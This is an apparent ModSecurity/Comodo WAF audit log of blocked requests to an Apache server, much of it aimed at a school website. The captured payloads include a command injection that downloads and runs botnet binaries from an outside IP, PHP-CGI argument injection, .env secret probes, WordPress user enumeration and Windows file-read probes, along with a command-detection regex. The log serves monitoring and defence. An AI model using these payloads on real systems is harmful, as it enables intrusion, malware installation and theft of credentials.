CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3a72e69-Z-- --26d19217-A-- [10/Jun/2025:16:06:52 +0700] aEf1rGkffiosQXBbxVZo1wAAANI 103.236.140.4 58014 103.236.140.4 8181 --26d19217-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --26d19217-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26d19217-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749546412219198 2945 (- - -) Stopwatch2: 1749546412219198 2945; combined=1326, p1=452, p2=844, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26d19217-Z-- --906c9d51-A-- [10/Jun/2025:16:11:35 +0700] aEf2x5Sz29O8wd7wtMvfbAAAAIE 103.236.140.4 35554 103.236.140.4 8181 --906c9d51-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/x86;chmod+777+*;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm7;chmod+777+*;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm4;chmod+777+*;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm5;chmod+777+*;./arm5+arm5 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --906c9d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --906c9d51-E-- --906c9d51-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/x86;chmod 777 *;./x86 x86;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm7;chmod 777 *;./arm7 arm7;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm4;chmod 777 *;./arm4 arm4;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm5;chmod 777 *;./arm5 arm5: cd/tmp rm -rf j nohup wget http://94.26.90.251/x86 chmod 777 * ./x86 x86 cd/tmp rm -rf j nohup wget http://94.26.90.251/arm7 chmo..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749546695395615 2388 (- - -) Stopwatch2: 1749546695395615 2388; combined=896, p1=468, p2=396, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --906c9d51-Z-- --7bd3976d-A-- [10/Jun/2025:16:23:52 +0700] aEf5qGkffiosQXBbxVZt2QAAAM8 103.236.140.4 50354 103.236.140.4 8181 --7bd3976d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.34.246 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.34.246 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7bd3976d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bd3976d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749547432095082 781 (- - -) Stopwatch2: 1749547432095082 781; combined=339, p1=300, p2=0, p3=0, p4=0, p5=39, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bd3976d-Z-- --8ea29c3a-A-- [10/Jun/2025:16:50:19 +0700] aEf_22QJEkWdvAT5oU7IVwAAAAU 103.236.140.4 59068 103.236.140.4 8181 --8ea29c3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; BNTV400 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Safari/537.36 Accept-Charset: utf-8 --8ea29c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ea29c3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749549019208534 761 (- - -) Stopwatch2: 1749549019208534 761; combined=299, p1=262, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ea29c3a-Z-- --2345734b-A-- [10/Jun/2025:18:43:26 +0700] aEgaXpSz29O8wd7wtMuBNAAAAIs 103.236.140.4 54174 103.236.140.4 8181 --2345734b-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 Accept-Charset: utf-8 --2345734b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2345734b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749555806941955 699 (- - -) Stopwatch2: 1749555806941955 699; combined=264, p1=231, p2=0, p3=0, p4=0, p5=33, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2345734b-Z-- --388d4516-A-- [10/Jun/2025:19:00:10 +0700] aEgeSmkffiosQXBbxVZhRwAAAME 103.236.140.4 56812 103.236.140.4 8181 --388d4516-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.166 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.166 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --388d4516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388d4516-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749556810827557 912 (- - -) Stopwatch2: 1749556810827557 912; combined=397, p1=354, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388d4516-Z-- --230f9b68-A-- [10/Jun/2025:19:00:12 +0700] aEgeTDQZgo88hy0TiYyxfgAAAEU 103.236.140.4 56986 103.236.140.4 8181 --230f9b68-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.166 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.166 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --230f9b68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --230f9b68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749556812792090 861 (- - -) Stopwatch2: 1749556812792090 861; combined=381, p1=341, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --230f9b68-Z-- --f5f74f58-A-- [10/Jun/2025:19:09:22 +0700] aEggcjQZgo88hy0TiYy8ygAAAEs 103.236.140.4 50204 103.236.140.4 8181 --f5f74f58-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 206.189.233.36 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 206.189.233.36 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f5f74f58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5f74f58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749557362018993 688 (- - -) Stopwatch2: 1749557362018993 688; combined=219, p1=192, p2=0, p3=0, p4=0, p5=27, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5f74f58-Z-- --b643a741-A-- [10/Jun/2025:19:19:14 +0700] aEgiwjQZgo88hy0TiYzH_AAAAEM 103.236.140.4 48990 103.236.140.4 8181 --b643a741-B-- GET /@fs/C:/windows/win.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.31.0 Accept: */* --b643a741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b643a741-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557954239827 2877 (- - -) Stopwatch2: 1749557954239827 2877; combined=1389, p1=366, p2=996, p3=0, p4=0, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b643a741-Z-- --b3c1b827-A-- [10/Jun/2025:19:19:15 +0700] aEgiw2QJEkWdvAT5oU5i4gAAAAU 103.236.140.4 49096 103.236.140.4 8181 --b3c1b827-B-- GET /@fs/C:/windows/win.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.31.0 Accept: */* --b3c1b827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3c1b827-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557955234037 2386 (- - -) Stopwatch2: 1749557955234037 2386; combined=936, p1=387, p2=523, p3=0, p4=0, p5=25, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3c1b827-Z-- --80957a45-A-- [10/Jun/2025:19:19:15 +0700] aEgiw2QJEkWdvAT5oU5i6gAAABM 103.236.140.4 49138 103.236.140.4 8181 --80957a45-B-- GET /@fs/C:/boot.ini?raw?? 
HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.31.0 Accept: */* --80957a45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80957a45-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557955584440 2361 (- - -) Stopwatch2: 1749557955584440 2361; combined=951, p1=379, p2=547, p3=0, p4=0, p5=25, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80957a45-Z-- --0d5e5d6d-A-- [10/Jun/2025:19:19:16 +0700] aEgixDQZgo88hy0TiYzIAwAAAEE 103.236.140.4 49208 103.236.140.4 8181 --0d5e5d6d-B-- GET /@fs/C:/boot.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.31.0 Accept: */* --0d5e5d6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d5e5d6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557956368604 2528 (- - -) Stopwatch2: 1749557956368604 2528; combined=1024, p1=397, p2=601, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d5e5d6d-Z-- --7a9eec7e-A-- [10/Jun/2025:19:36:02 +0700] aEgmspSz29O8wd7wtMvIWwAAAI0 103.236.140.4 60140 103.236.140.4 8181 --7a9eec7e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: */* --7a9eec7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a9eec7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749558962431869 1422 (- - -) Stopwatch2: 1749558962431869 1422; combined=414, p1=370, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a9eec7e-Z-- --64c0021d-A-- [10/Jun/2025:19:39:41 +0700] aEgnjZSz29O8wd7wtMvOOgAAAIo 103.236.140.4 49504 103.236.140.4 8181 --64c0021d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; 1607-A01 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/2867 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --64c0021d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64c0021d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749559181564568 939 (- - -) Stopwatch2: 1749559181564568 939; combined=429, p1=386, p2=0, p3=0, p4=0, p5=42, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64c0021d-Z-- --e7dc331f-A-- [10/Jun/2025:19:39:44 +0700] aEgnkGkffiosQXBbxVahnAAAAMo 103.236.140.4 49762 103.236.140.4 8181 --e7dc331f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Accept-Charset: utf-8 --e7dc331f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7dc331f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749559184237272 876 (- - -) Stopwatch2: 1749559184237272 876; combined=312, p1=272, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7dc331f-Z-- --a0c00023-A-- [10/Jun/2025:19:55:04 +0700] aEgrKGQJEkWdvAT5oU6MCwAAAAU 103.236.140.4 49800 103.236.140.4 8181 --a0c00023-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.161 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a0c00023-C-- --a0c00023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0c00023-E-- --a0c00023-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749560104917348 6191 (- - -) Stopwatch2: 1749560104917348 6191; combined=4607, p1=610, p2=3955, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0c00023-Z-- --78f96576-A-- [10/Jun/2025:19:57:59 +0700] aEgr12kffiosQXBbxVa8qQAAAM8 103.236.140.4 37222 103.236.140.4 8181 --78f96576-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Accept-Charset: utf-8 --78f96576-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f96576-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749560279445814 837 (- - -) Stopwatch2: 1749560279445814 837; combined=360, p1=320, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f96576-Z-- --1663352e-A-- [10/Jun/2025:20:00:34 +0700] aEgscpSz29O8wd7wtMvrOgAAAJA 103.236.140.4 51482 103.236.140.4 8181 --1663352e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 74.142.9.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.142.9.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1663352e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1663352e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] 